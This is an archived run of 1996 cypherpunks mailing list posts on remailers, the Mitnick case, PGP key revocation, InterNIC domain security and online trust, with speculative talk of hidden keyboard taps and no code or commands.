Thanks to MH,


The report is available by anon ftp from ftp.wimsey.com in

/pub/crypto/Doc/crypto_policy_report.12.95


or from a WWW browser via URL:

ftp://ftp.wimsey.com/pub/crypto/Doc/crypto_policy_report.12.95










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jan 1996 09:40:11 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy?
Message-ID: <199601070127.UAA26984@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   On small boxes, John Dvorak in Jan 23 PC Mag:

   "Other Things of Interest Dept: Virtual I-0, the Seattle
   company that brings you those nifty 3-D LCD eye-glasses,
   was showing [at Comdex] a complete hard disk-based computer
   the size of a beta video cassette. The idea was that you
   could plug in a keyboard and the video headset and finally
   have that computer-without-a-screen concept that we've been
   promised. Perfect for someone wanting genuine privacy,
   although I think once we start seeing a plane load of
   people all wearing virtual reality headsets, the world
   becomes a little creepier.

   Most Interesting Rumor Dept: Supposedly, Microsoft is
   quietly wooing Hitachi and has secretly ported Windows 95
   to the Hitachi 32-bit RISC processor. It hopes to have
   Casio build and market a small RISC computer about half the
   size of the Newton in an attempt to open up the market for
   those little hand-held, do-all gizmos that seem to be
   attracting a lot of attention in Japan. This is being
   developed by the same group who did the Timex/Microsoft
   watch, I'm told. When I pressed on whether this will really
   be Windows 95 or Windows NT with a Windows 95 shell, I was
   told it will be plain-vanilla Windows 95 stripped down to
   fit on a smaller platform. If Microsoft ports plain Windows
   95 to other chips, this will not sit well with Intel.

   Maybe this thing is the wallet computer that Gates keeps
   mumbling about in his more recent speeches."













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Jan 1996 13:36:01 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Mixmaster On A $20 Floppy?
Message-ID: <m0tYmxK-00090gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:50 PM 1/6/96 -0500, you wrote:

>>Someone can get one of those tiny devices that slips on the end of a  
>>keyboard connector and captures all the scan codes - you're better off  
>>bringing the whole computer (laptop) along with your floppy.  
>> 
> 
>First, I am not convinced that such devices exist in the real, practical
>world. They would require either storage hardware or radio transmitters,
>all in a package small enough to be undetectable to the naked eye. 

As a ham I can tell  you that such devices will ALMOST CERTAINLY exist, at least in arbitrarily small quantities against high-value, rare targets.  All that's needed is an VHF/UHF/microwave oscillator whose frequency is varied slightly in response to a change in control voltage (which in this case would be the data line voltage).   The antenna would be the data line itself.   Commercially, they are called VCO's (voltage controlled oscillator) or VCXO's (voltage controlled crystal oscillator).  Historically, many were/are built in packages the size of large oscillator modules, with pinouts compatible with 14-bit dips.  These are the dinosaurs of the current era.  More modern are surface-mount parts substantially smaller than a TO-92 transistor case. 

It is probably possible to put a VCO in an SOT-23 package, which is so small that unless your vision is good it's hard to see!  Embedding these in a custom, one-off cable for a black-bag job would be rather easy, even for an organization far less sophisticated than the NSA/CIA. Another option would be to make the thing look like a surface-mount resistor or capacitor, and replacing an existing bias/decoupling component in an existing keyboard product.  I think chances are very good that the NSA/CIA buys at least "one of" EVERYTHING sold (especially keyboards) to plan for just such jobs.

>Second, I do not think it practicable that the cosmic-nasties (of one's
>chosen social bias) could, in the real, practical world, run black-bag jobs
>on tens of thousands of surburban garages as a prophylactic measure against
>teenagers "playfully" setting up Mixmaster sites.

_THAT_ is probably true, given "tens of thousands."  But individual hardware can indeed be attacked.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 7 Jan 1996 10:56:20 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster On A $20 Floppy? (fwd)
Message-ID: <199601070243.UAA06855@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: John Young <jya@pipeline.com>
> Date: Sat, 6 Jan 1996 20:27:02 -0500
> Subject: Re: Mixmaster On A $20 Floppy? 
> 
>    "Other Things of Interest Dept: Virtual I-0, the Seattle
>    company that brings you those nifty 3-D LCD eye-glasses,
>    was showing [at Comdex] a complete hard disk-based computer
>    the size of a beta video cassette. The idea was that you
>    could plug in a keyboard and the video headset and finally
>    have that computer-without-a-screen concept that we've been
>    promised. Perfect for someone wanting genuine privacy,
>    although I think once we start seeing a plane load of
>    people all wearing virtual reality headsets, the world
>    becomes a little creepier.


Anyone looking for small 486 compatible pc's should check out the system
that scuba divers have been using for the last couple of years. They strap
on your tank, have a cable with one-hand keyboard (usually hangs on the R.
since your console is on the L.) that emulates a standard 101 and uses a
small display that hangs off your mask. They run standard windows apps and
are not too expensive. Check your local dive shop for specifics.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jan 1996 10:31:14 +0800
To: cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
Message-ID: <199601070216.VAA02580@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Perry's askance leads me to propose stealing Littman's
   book. It's as techno-thrilling as cypherpunks in describing
   the melodrama of unexpected human/technology malfunctions.

   True, only a bit of bare crypto in it, with Kevin advising
   Littman to use PGP so his Well mail could not be read -- as
   Kevin's e-mail to Littman was by Shimomura and Markoff.
   Littman says that was how Markoff learned of Kevin's and
   Littman's exchanges and why Markoff started hustling
   Littman for leads on Kevin to feed the trackers.

   Also, crypto-related: The fact that Shimomura's supposedly
   secret files were not protected by encryption or other
   security is what causes Littman and others to think there
   was a sting (perhaps with TLA help) rather than foolish
   vanity of the security wizard.

   Best, the book provides Clancy-like fun in deciphering the 
   question of why humans abuse technology to mask their 
   own frailty.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Jan 1996 12:20:57 +0800
To: cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
Message-ID: <ad1484300b0210043dd3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:45 AM 1/7/96, Lucky Green wrote:

>Of course it was a set-up. Mitnick got into Shimomura's computer by
>impersonating the IP address of one of Shimomura's machines. The router
>should have never let packets in from outside that have an IP address that
>is supposed to be inside. That a 'security expert' would overlook such a
>blatant and well publicized hole in his _own_ router is inconceivable.
>
>Shimomura was trying to get someone to break into his system. If the bait
>was specifically for Mitnick, we may never know.

I've met Shimomura several times, and I don't think he was trying to get
someone to break into his system. I tend strongly to believe his basic
story, that he found someone entering his system. (Shimomura as I have met
him is not some kind of Junior G-Man, intent on catching minor criminals.
He's about as counter-cultural as any of us. Thus, his account that he
found Mitnick breaking into his systems and stealing things as a taunt
rings more true than some view that he is an FBI or BATF narc in training.)

As to whether a security expert should have seen this coming, there are a
couple of factors at work. First, being a security expert/consultant
doesn't mean one has perfect security oneself (the shoes of the cobbler,
etc.). Second, new attack modes are often involved. Third, Shimomura _did_
ultimately find the attack.

As to what really happened with Shimomura, Markoff, Mitnick, and the Feds,
I have no idea. The Littman account is one side of the story. The
Shimomura-Markoff book will be another. The various movies and other deals
will further complicate the picture. (There are some mighty strange
characters involved. Katie Hafner, former wife of Markoff, wrote a piece
for one of various weeklies or monthlies (maybe "Esquire," as I recall)
about a former prostitute living in a trailer in Nevada--do former
prostitutes ever live anywhere else?--who was badmouthing Shimomura and
praising her buddy Mitnick...bizarre stuff...maybe it's make it into the
movie. I understand that Christian Slater has agreed to play Mitnick, John
Lone will play Shimomura, and Richard Drefuss will get the role of
Markoff.)

Knowing Markoff, Shimomura, and (vaguely) Menapace, and not knowing either
Littman or Mitnick, I am somewhat biased toward the M-S-M view of things.

While I don't think news of Mitnick is utterly alien to our group, I think
people need to be discriminating in ascribing pro-Mitnick views to the
Cypherpunks, at least as individuals. Supporting Mitnick just because he is
a "hacker" or a "cracker" or a "cyber-outlaw" is wrong-headed.

Also, I'm not persuaded that the Feds used blatantly illegal search and
seizure tactics to arrest Mitnick.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 7 Jan 1996 06:20:23 +0800
To: Jim Choate <cypherpunks@toad.com>
Subject: Re: Internet & Porno on A&E tonite
Message-ID: <199601062218.RAA12597@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jan 1996 10:54:55 -0600 (CST), you wrote:


>Hi,

>Just saw an add for a Investigative Reports show tonite on A&E dealing with
>the Internet and some of the current issues relating to porno and privacy.

What time?!?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Jan 1996 15:17:15 +0800
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
Message-ID: <m0tYofO-0008xhC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 1/6/96 -0500, you wrote:

>ObGPS/cpunk/physical-location-of-machines: A recent IETF proposal would
>create a new DNS record that encoded the physical location of a
>machine, encoded in latitude and longitude. This would solve the
>problem MIT has had in distributing PGP, i.e. where exactly is
>unix5.netaxs.com? However, there's nothing to stop you from adding
>records that say your machines are at the latitude and longitude of,
>say, Fort Meade... ;-)
>
>    ftp://ds.internic.net/rfc/rfc1876.txt
>
>Again, I'm not too sure of the viability of this proposal. Not on
>effectiveness of proving true location -- it is more geared toward
>"visual 3-D packet tracing" -- but simply because I have _no_ fricking
>idea where our machines are (in terms of lat and long) to any degree
>of accuracy.

Question:   Do we really WANT to advertise the location of machines?  Especially to an accuracy commensurate with current technology?  And if lying is possible, what's the point?!?

>("They're somewhere in PA." Brilliant, you can find that
>out via WHOIS.) The document suggests using GPS to locate your true
>location, but I'll be damned if my boss is going to spend $1,000 just
>so I can have more DNS entries to maintain...

BTW, the cheapest GPS receivers (Magellan 2000's, as I recall) at $200 at the local marine supply shop. Excellent price.  Even so,  I won't buy one when I get my first GPS reciever, for two reasons:

1.  No differential capability.  (will improve accuracy to typically 2 meters)
2.  Only two digits past the "minutes" decimal point resolution.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 7 Jan 1996 14:44:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Mixmaster On A $20 Floppy?
Message-ID: <ad15159e03021004e3e7@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The second paragraph of this post seems to address a different issue than
the first. The problem of correlations between a certain sender sending and
a certain receiver receiving, is well known and understood. The best
defense against this (as a sender) is to send messages into the remailer
network with a period equal to or less than the the time required for a
message with your typical chain length to pass through the remailer net. If
these are sent at random intervals, then your real mail will blend with the
cover traffic, and mail from you will correlate with all message receipts
by all message recipients.

The second paragraph seems to deal with the issue of being known as an
anonymous remailer or regular remailer user. I am not sure exactly what the
concern with that is.

        -Lance

At 11:56 PM 1/5/96, Futplex wrote:
>The "ultimate" traffic analysis problem, as others have observed, is
>the correlation between messages sent by A and received by B via the overall
>network. Hence the utility of a Dining Cryptographers' Net, PipeNet, etc. in
>which the apparent bandwidth variation between any two points is eliminated.
>A and B are effectively folded into the network.
>
>I suppose that a site that escapes detection as a Mixmaster will throw off
>the correlation stats (i.e. because a message from that site to B won't be
>identified as a remailed message). But such sites are elusive objects I
>think. On the one hand, the site can't endure for long, or else its
>throughput traffic will likely give it away as an anonymizer (i.e. it gets
>lots of mail from the Mix network, and sends out similar amounts of mail to
>all sorts of people and the network). On the other hand, it had better last,
>or else it will look suspicious as a transient account receiving mail from
>the Mix network, sending a few messages, and quickly vanishing.
>
>Futplex <futplex@pseudonym.com>
>"Dammit Jim, I'm a doctor, not a bricklayer!"
>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO9nDfPzr81BVjMVAQF1YQgAo08ndnu7Lcok3O12hCYz57j+PClp8ulk
LRRGGejhTNerums+FInio2IUQK3YvWLsIUj+UkZZkYPGAV292AsKnQROzBAYZ2kd
V8MdVUqolZQfFzR7VYS2n+6ARlplff0E+58X2NDHgw25welmg7Id/xJmjiIwHI8J
U6eGUw0BhMKrQuXCv4NpUsYGC2ux2abOs+Y2f4pjzSSyJhLuAXJbzlr0eRYWPOj7
AU2AAs/l4xTGbErYc2F5D9pfTJe6sMkUCseIyVpsoLUMsg24LItlDOUq1feT2ppq
X1LJQRu05ERt3LIhjB5JHFClxecQyw31JDZV8E2H19mawK1LIkgKNA==
=MU1s
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@aztech.com
Date: Sun, 7 Jan 1996 14:03:16 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: please stop the Mitnick stuff
In-Reply-To: <199601070023.BAA04907@utopia.hacktic.nl>
Message-ID: <9601070542.AA01803@Mail.AZTech.Net>
MIME-Version: 1.0
Content-Type: text/plain


I don't usually rant, but nobody@replay.com (Anonymous) said:

#C'mon, Perry, give it a break.  Mitnick's case has to do with security
#issues as well as the violations of privacy and/or search and seizure
#the government used to arrest him.
#It may not be cryptography per se, but are you going to seriously argue
#that security, etc. is not encompassed in crypto issues?
#I found it interesting.  If you didn't, then all you had to do was
#delete it.  No one needs to read your personal crusade as *The One*
#who tells us what's relevant and what's not.

I too found it interesting reading (agreeing with your position).  I 
too found it to be off-topic/off-charter (agreeing with Perry's position.)

It really torques me when someone suggests: (in response to someone else's 
suggestion that something was off-topic) "just delete it."  I subscribe to 
a lot of mailing lists and news groups.  Anything that contributes to the 
noise/signal ratio, and doesn't aplologize for it is a bad thing, IMHO.

To be more on-topic, if Mitnick knew more about crypto and covert ops, he 
probably woudln't have been caught as easily.  When he was caught, the feds 
probably wouldn't have been able to gather as much evidence against him.

I'll stop ranting, now.  You probably don't know me, and probably don't 
care about why I don't care to read alt.fan.kevin.mitnick stuff on the 
cypherpunks list.

FWIW,

--
S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 7 Jan 1996 12:29:37 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
Message-ID: <Pine.SUN.3.91.960106225307.9277A-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


The InterNIC (the company responsible for registering .COM, .EDU,
.ORG, and .NET domains) has had a great deal of trouble lately, with
people submitting malicious CHANGE DOMAIN requests (change admin or
technical contact, point root nameserver entries to rival ISPs, etc).
In response, the InterNIC has created "the Guardian project" which
delineates who has access and authorization to change data in the
InterNIC's record. Not much new cpunk relevance, but much of what has
been discussed here is very applicable to this project (digital
signatures, common access to databases, etc).

I'm not completely pleased with their implementation, but it will do
for now. They _do_ support PGP as an access controller within the
Guardian project, and they have purchased a copy from ViaCrypt for
this purpose. A good thing, says I. Check out their proposal:

    ftp://rs.internic.net/policy/internic/internic-gen-1.txt

ObGPS/cpunk/physical-location-of-machines: A recent IETF proposal would
create a new DNS record that encoded the physical location of a
machine, encoded in latitude and longitude. This would solve the
problem MIT has had in distributing PGP, i.e. where exactly is
unix5.netaxs.com? However, there's nothing to stop you from adding
records that say your machines are at the latitude and longitude of,
say, Fort Meade... ;-)

    ftp://ds.internic.net/rfc/rfc1876.txt

Again, I'm not too sure of the viability of this proposal. Not on
effectiveness of proving true location -- it is more geared toward
"visual 3-D packet tracing" -- but simply because I have _no_ fricking
idea where our machines are (in terms of lat and long) to any degree
of accuracy. ("They're somewhere in PA." Brilliant, you can find that
out via WHOIS.) The document suggests using GPS to locate your true
location, but I'll be damned if my boss is going to spend $1,000 just
so I can have more DNS entries to maintain...

--
Michael Handler <grendel@netaxs.com>      <URL:http://www.netaxs.com/~grendel>


        "Hours of frustration punctuated by moments of sheer terror."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 7 Jan 1996 12:33:46 +0800
To: John Young <jya@pipeline.com>
Subject: Re: please stop the Mitnick stuff
In-Reply-To: <199601070216.VAA02580@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960106230400.3020I-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm enjoying the story, partly because I took copious abuse from some 
CPs for posting - before Mitnick hit the papers - that the Well was under 
surveillance.  [Crypto relevance of (TLA contract?) surveillance of ISPs 
should be obvious.]

Anyway, it's too bad Mitnick didn't read CP.

I'm still angry about the Well's voluntary cooperation in this scam.
Why should I pay money to an outfit that's in bed with the TLAs?


bdolan@use.usit.net, formerly bdolan@well.com


On Sat, 6 Jan 1996, John Young wrote:

>    Perry's askance leads me to propose stealing Littman's
>    book. It's as techno-thrilling as cypherpunks in describing
>    the melodrama of unexpected human/technology malfunctions.
> 
>    True, only a bit of bare crypto in it, with Kevin advising
>    Littman to use PGP so his Well mail could not be read -- as
>    Kevin's e-mail to Littman was by Shimomura and Markoff.
>    Littman says that was how Markoff learned of Kevin's and
>    Littman's exchanges and why Markoff started hustling
>    Littman for leads on Kevin to feed the trackers.
> 
>    Also, crypto-related: The fact that Shimomura's supposedly
>    secret files were not protected by encryption or other
>    security is what causes Littman and others to think there
>    was a sting (perhaps with TLA help) rather than foolish
>    vanity of the security wizard.
> 
>    Best, the book provides Clancy-like fun in deciphering the 
>    question of why humans abuse technology to mask their 
>    own frailty.
> 
> 
> 
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 7 Jan 1996 12:52:53 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: please stop the Mitnick stuff
In-Reply-To: <199601070023.BAA04907@utopia.hacktic.nl>
Message-ID: <199601070438.XAA26617@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry Metzger writes:
> This is cypherpunks, not Mitnick punks, Shimomura punks, or anything
> similar. I personally don't care about Kevin Mitnick, and he most
> certainly has little to no cryptography relevance at this point. Take
> it elsewhere.

I agree 100% with Perry. The Mitnick discussion is somewhat more stimulating
than the recent flood of alt.security.pgp fodder (HINT HINT use 
alt.security.pgp instead HINT HINT), but it doesn't belong here either.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO9OIynaAKQPVHDZAQHKrQf9Hc/wotKRqNKTYVQ4Zno6++CXIphyLrH8
qUL8pkTcTkoxB10X6x+TueA2jNFzZbzAdCpR1K20SSFXSSFwmvOtjqsSsJlKhyBC
BLlGOtlWfZ9MxOPT/cXkr0a8GRKVz5G38h53vULnttI86eGGuO6XS4p/nBlyPqO5
oZJAFXJjjYSDXkmUKelRv5dKvf7z1sKjzbU0rZl95yX3t/Jy/PamroGWt7dEG//U
64ET47ZYBGg4xEG6hsJlOKiOVH5AmBk2lAUFricrkNw8ytzKwkVwJ0habZ45c0zy
fyk+Dl6Kjcr/RO+FMkRKS0c0njmMBrLjDiiSZ3S80uuGc18IIwq9hw==
=VLoM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.hoplite.org (Michael P. Brininstool)
Date: Sun, 7 Jan 1996 07:58:28 +0800
To: cypherpunks@toad.com
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
Message-ID: <1996Jan6.154423.21243@freke.hoplite.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>,
Brad Dolan  <bdolan@use.usit.net> wrote:
>Date: Tue, 2 Jan 1996 00:02:44 -0500 (EST)
>---------- Forwarded message ----------
>Coming off CompuServe's announcement last week that it was 
>cutting off all access to "alt.binaries" newsgroups under 
>pressure from the German government, I'm passing along another 
>apparent development from another Internet access provider, 
>Netcom.
> 
>Under the guise of a minor software upgrade, Netcom has changed 
>its newsgroups access list to totally exclude "alt" groups 
>altogether.  Since there is no way to sign up for a newsgroup 
>other than via the selection menu that Netcom provides, it 
>appears that Netcom has managed to censor access to all those 
>discussion groups.

I saw all the posts regarding this and proclaiming it to be false.  I
feel obligated to point out a discussion we had at work last week about
our news feeds (I work for an ISP).  Our news machines are constantly
filling up, and we can only add so much disk-space to the news spools.
We have been reducing the expire times, and the news spools are still
filling up too fast.  40%, I think it was, of the news was alt.*.  I
suggested (Bad, Mike!) that we kill all the alt.* groups, and add back
only those that people customers actually request.  The whole
engineering group jumped down my throat saying that that action would
be seen by the customers, and potential customers, as censorship.  I
withdrew my proposal, because I agreed with them.

The reason I bring this up is to point out that the removal of the
alt.* groups does not necessarily mean the people removing those groups
are trying to censor anything, but may just be trying to reduce the
resources eaten by news on their systems and network.

-------------------------------------------------------------|
| #include "std/disclaimer.h"         Michael P. Brininstool |
| http://www.hoplite.org/~mikepb/     NIC: MB458             |
|-------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Fisher <leefi@microsoft.com>
Date: Sun, 7 Jan 1996 20:12:37 +0800
To: "cypherpunks@toad.com>
Subject: Re: "Microsoft.com" added to my KILL file
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG960106235119SI006300@red-02-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


| After getting another batch of bounce messages from Microsoft's 
Postmaster,
| I have reluctantly decided to filter out all messages from Microsoft.com
| until they fix this problem with Microsoft Exchange.

I'm not in the Exchange group, not the internal operations group responsible 
for this last error, but I'll try to clarify the two issues raised by this 
thread. (But perhaps this message was pointless, as the folks I'm attempting 
to explain to have already this filtered out by their KILL file?)

MSMail and Exchange started before MIME started. They wanted to have 
"richer" email (as with MIME), and started some efforts, which put data in a 
uuencoded WINMAIL.DAT file. Exchange switched from TNEF (Transport Neutral 
something or another) to MIME. Originally the default was to send "rich" 
email but after beta feedback came in, it was changed to NOT be the default. 
So, these winmail.dat and MIME (and some TNEF) data included in some 
messages are from MSMail and Exchange clients. And while I expect that there 
are some things that our MS Mail and Exchange groups could have done better 
to introduce support for more than just ASCII messages, there is also some 
user education needed (that some forums -- such as mailing lists and 
newsgroups) often aren't the right place to post non-ASCII text like MIME 
attachments and older winmail.dat files.

Another issue (the one mentioned in the above message). Last week the mail 
server operations group on Microsoft campus experienced a few "growing 
pains" switching over to later builds of Exchange server, switching over 
from MS Mail. Apparently there were some brief problems, causing some bounce 
messages, which would have manifested from a few users @microsoft.com. I 
don't know if it due to humans (operations group error) or computers 
(Exchange server bug) that caused it. The flurry of bounces was [hopefully] 
a one-time problem.  

Lee Fisher, leefi@microsoft.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jan 1996 13:13:03 +0800
To: cypherpunks@toad.com
Subject: Re: please stop the Mitnick stuff
Message-ID: <199601070455.XAA14715@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Littman mentions toad.com twice -- that site, a character says, 
suspiciously, "run by one of the founders of Sun." Used, 
allegedly by the perp, to get into the drawers of, Well, you 
know.


BTW, Littman says, and that Markoff agrees, that it was not 
Mitnick who got into Shimomura's underware, but, more than 
likely, the "Israeli." Apparently, an incident occurred after 
Kevin's bust.


Agree with Tim that the Markoff/Shimomura book is needed to see 
both sides.


For now, Mitnick seems to be a hapless pawn. Me too, about 
stuff I only read about.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 7 Jan 1996 08:55:08 +0800
To: "tcmay@got.net>
Subject: RE: Revoking Old Lost Keys
Message-ID: <01BADC96.AA0A0B20@dialup-169.dublin.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


On Saturday, January 06, 1996 07:19, Timothy C. May[SMTP:tcmay@got.net] wrote:
>At 9:47 AM 1/6/96, Frank O'Dwyer wrote:
>>On Saturday, January 06, 1996 09:18, Timothy C. May[SMTP:tcmay@got.net] wrote:
>
>>>Basically, you are screwed. Any revocation you attempt will not be trusted,
>>>as we will suspect the new "you" to be an attacker, perhaps an agent of the
>>>NSA or the Illuminati. In the view that "you are your key," the old you no
>>>longer exists.
>>
>>This is true, but the "old you" can be resurrected if you can get enough
>>people to believe your new key using any out-of-band means available
>>to you.  You can also put a comment in your new key's uid explaining the
>
>Could you explain how "enough people" can get around a basic
>feature/limitation of the current PGP web of trust? Who, besides the
>originator, can revoke an old key? How many does it take?

I wasn't referring to revoking the old key, but to introducing a new one
and letting the old one fall into disuse. I think this can sometimes be 
done even if you've lost access to the old key, albeit in a painful out-of-band 
fashion.  It does depend on the application, though, and if the (relevant 
portion of the) web of trust was very large, you might find that the old key 
kept popping up and you kept getting mail (or whatever-it-is-you're-encrypting) 
that you couldn't read. (and/or some people wouldn't believe your signatures).

Basically, PGP's revocation model is broken unless you create a revocation
cert. at the time you make your key, and keep it safely somewhere in case
you need it.  Even then, as time goes by the keyring keeps accumulating all 
these extra packets and growing without bound.  It's not just PGP--all long-lived 
certificates are hard to revoke (for example X.509's revocation is also clunky).  
It's just that PGP's certificates are particularly long-lived, and PGP's revocation is 
particularly broken. Luckily the data formats do allow for a validity time, and a 
revocation of a key's countersignature, so this can perhaps be fixed sometime.

>If a bunch of the "alleged" friends of Bruce could do this, could they not
>revoke the key of someone they simply wish to hassle?

Well, see above. The key is not revoked.  But a bunch of people _could_
attempt to introduce a key under the name of someone they just wanted to 
hassle.  The conspiracy doesn't have to be especially large. For example, it 
would be easy for me to invent a key for you and have _my_ friends believe it
even in spite of your real key being on their keyrings.  It wouldn't be so easy 
for me to get _your_ friends believe it.  In Bruce's case, he'd be trying to do
a similar thing, except that the key'd really be his, and more people'd be
likely to believe him (especially his friends, and their friends, and so on).

>I agree that a new key can be generated, and a new "Please use this key,
>not the other one" message sent, and this may work, but I don't believe
>this revokes the old key and removes it from the keyservers. I could be
>wrong, as I am certainly no expert on the keyservers.

I think you're right.  The key will still be out there.

>The question is: is there a "majority vote" mode on the keyservers that
>causes them to remove a key if enough people claim it is no longer valid?

I don't think so.  At best, you might be able to convince the admins to
manually delete the old key from the server's rings (assuming the software is able
to do this).  Even then, the key might keep popping back up, for example
if you had countersigned other people's keys with your old key and they kept
uploading their key with additional signatures.  A practical solution
might be for the key servers to automatically remove keys older than X 
years (or some time limit related to the key size).  Ultimately though, what 
is needed is a new revocation model (maybe implementing the unused fields 
in the PGP certs is good enough to begin with).

Cheers,Frank O'Dwyer
fod@brd.ie                          http://www.iol.ie/~fod





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 7 Jan 1996 13:36:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <01BADC99.C7034FE0@dialup-169.dublin.iol.ie>
Message-ID: <199601070522.AAA26624@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frank O'Dwyer writes:
[I've adjusted the line breaks for those of us with 80-column displays]
> Privilege is also relative, but identity is not (nyms and that aside).  

That's a pretty large aside !

> I'm Frank O'Dwyer anywhere I go,

I am definitely not "Futplex" in many places I go, and often I am not anyone 
in particular.

"Auuugh! Single personality disorder! No cure!" -Beverley R. White

> but I'm not "loyal bank customer" to all banks. Also, it's easier to 
> securely determine that I'm Frank O'Dwyer than it is to securely determine
> (say) my credit limit. So, a signator's job in signing for my identity is 
> easier (and less risky) than signing for my trustworthiness.  

I am doubtful. I can't vouch for the identities of very many people on this 
list. (I've even met, e.g., Lucky in person and I certainly have no clue
what his verinym might be, nor do I particularly care.) On the other hand, I
am willing to sign onto all sorts of judgements about the trustworthiness of
various people on the list, and other aspects of their reputations. I've
driven hundreds of miles based on trust developed online with people whose
identities I still haven't verified. I've even agreed to loan hundreds of
dollars to someone I knew only as an online pseudonym.   

[...]
> Plus, given secure identity (which might be an anonymous id), you can 
> layer the other stuff on top.  

I am swayed by the view expounded by Carl Ellison that a key, not an
identity, should be the anchor to which attributes are attached. (Sorry if
I am misstating or oversimplifying the position here.) I think identity 
should be hung off the key as just another (optional) attribute.

I think your comments apply pretty well to trust relationships in the flesh,
but don't fully take the net into account.

Futplex <futplex@pseudonym.com>
The Pack Is Back

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO9YXCnaAKQPVHDZAQHKwwf/UQWZY9X9KV27qePoqPLRdsDN0Yn9v27F
uIDapw0btdS4i9kkGONN/dGMC9EvQJv2ZOemIvqJ/0R09X7tD1bRIrqzDokvZEKw
